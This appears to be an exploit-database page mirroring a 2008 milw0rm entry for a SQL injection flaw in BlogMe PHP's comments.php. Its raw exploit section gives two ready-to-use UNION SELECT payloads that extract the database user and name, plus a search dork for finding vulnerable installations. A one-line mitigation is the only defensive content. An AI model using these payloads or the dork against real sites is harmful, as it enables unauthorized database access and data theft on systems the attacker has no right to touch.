header-logo
Suggest Exploit
vendor:
BlogMe PHP
by:
His0k4
8.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: BlogMe PHP
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

BlogMe PHP remote SQL injection exploit

An attacker can exploit a SQL injection vulnerability in BlogMe PHP to gain access to the database. The exploit involves sending a maliciously crafted HTTP request to the comments.php page with an ID parameter set to -1 UNION SELECT 1,2,3,4,5,6,aes_decrypt(aes_encrypt(user(),0x71),0x71)-- OR -1 UNION SELECT 1,2,unhex(hex(database())),4,5,6,7--.

Mitigation:

Ensure that user input is properly sanitized and validated before being used in a SQL query.
Source

Exploit-DB raw data:

###########################################
{+} BlogMe PHP remote SQL injection exploit
{+} Script download : http://www.drumster.net/gamma/downloads/BlogMe11.zip
{+} Founded by : His0k4 [ ALGERIAN HaCkEr ]
{+} Greetz : All friends & muslims HaCkeRs...
{+} Dork : "BlogMe PHP created by Gamma Scripts"
###########################################
{+} Exploit :
http://localhost/[BlogMe_path]/comments.php?id=-1 UNION SELECT 1,2,3,4,5,6,aes_decrypt(aes_encrypt(user(),0x71),0x71)--
OR :
http://localhost/[BlogMe_path]/comments.php?id=-1 UNION SELECT 1,2,unhex(hex(database())),4,5,6,7--
###########################################

# milw0rm.com [2008-05-03]

Navigation

Suggest Exploit

Services By CQR